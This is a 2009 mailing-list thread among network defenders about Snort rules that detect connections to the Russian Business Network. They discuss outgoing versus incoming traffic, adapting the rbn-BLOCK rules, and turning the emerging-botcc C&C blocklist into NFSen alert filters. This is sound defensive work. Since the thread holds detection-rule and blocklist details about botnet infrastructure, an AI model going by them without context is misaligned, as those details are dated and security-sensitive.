with NFSen was to write a Perl script to convert the emerging-botcc list
into a straight IP list for an NFSen filter.  That's because I populate
NFSen's alert filters with many IP blacklists which I amalgamate.  If you
think that sounds ridiculous, I encourage you to check out the thorough and
extensible front-end capabilities of NFSen for flow querying, reporting, and
alerting to see why it would be worth setting up, and where your Perl-fu
might be better spent for flows.

Anyway, I'm not trying to sell you on something you don't want to buy, but I
thought mentioning an alternative solution might help out some of you at
medium-to-large organizations.

--Martin

On Wed, May 27, 2009 at 11:06 AM, Eoin Miller <
eoin.miller at trojanedbinaries.com> wrote:

> I think the difference actually lies in the implementation at differing
> sites. Upon further review, the rbn-BLOCK rules are the way that appears
> to help our situation most. However, we are not running inline or have
> SnortSam configured at our site so I mistakenly ignored the contents of
> the rbn-BLOCK rules. We still have to modify rbn-BLOCK to get rid of the
> fwsam portion of the rule prior to use for our implementation.
>
> Creating an incoming and outgoing ruleset is helpful for those who do
> not use Snort in an IPS fashion. It is not always feasible at every
> organization to do so, even if desired.
>
> --
> Eoin Miller
>
> waldo kitty wrote:
> > Eoin Miller wrote:
> >> Please review the current rbn-rules as they do not alert/block to any
> >> outgoing TCP connections to the RBN:
> >
> > been there, done that ;)
> >
> > my understanding in this set of RBN oriented threads is that some have
> > proposed sets of rules for both, internally looking and externally
> > looking sensors...
> >
> > [trim of example rule]
> >
> >  > Short of doubling the rules (one for incoming and the other for
> >> outgoing) adding the SA flag, instead of just the S flag, tracks who is
> >> reaching out instead of just who is reaching in.
> >
> > this doubling has been proposed...
> >
> >> Clients are not
> >> infected by RBN reaching in, they are infected by reaching out